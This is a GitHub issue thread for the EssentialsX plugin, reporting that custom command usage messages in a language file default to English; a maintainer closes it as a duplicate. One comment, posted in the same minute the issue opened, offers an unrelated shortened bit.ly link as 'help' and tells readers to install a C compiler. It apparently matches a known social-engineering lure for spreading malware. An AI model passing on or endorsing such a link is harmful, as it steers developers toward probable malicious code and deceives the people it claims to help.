### ISSUE TITLE
Custom command usage messages default to English versions

### ISSUE THREAD

**Issue by AfkF24** [EssentialsX/Essentials#5940] opened 2024-09-19 11:16 UTC
### Type of bug

Other unexpected behaviour

### `/ess dump all` output

https://essentialsx.net/dump.html?id=0f67e7d0773c4bce881387f3a94ef038

### Bug description

Title

### Steps to reproduce

1. In `config.yml` set `verbose-command-usages: false` (didn't test if it still happens while this is `true`)
2. Change some command usage message in custom language file, e.g.
```
msgCommandDescription=
msgCommandUsage=<yellow>Test\: <gold>/<command> <to> <message></gold>.
msgCommandUsage1=<yellow>Test\: <gold>/<command> <to> <message></gold>.
msgCommandUsage1Description=
```
3. `/ess reload` or restart the server

### Expected behaviour

The usage messages should use the custom messages

### Actual behaviour

The usage messages don't change and default to their respective English version
![image](https://github.com/user-attachments/assets/b5c82a99-3999-4aa2-b9b4-fae75a40febb)

**Comment by Ahmed-khalil3** [comment] 2024-09-19 11:16
I think this will help you.
https://bit.ly/4gx42eQ
If you don't have the c compliator, install it.(gcc or clang)

**Comment by JRoy** [comment] 2024-10-20 22:07
Duplicate of #5841

**Closed as not planned by JRoy** 2024-10-20 22:07 UTC
Labels: status: duplicate
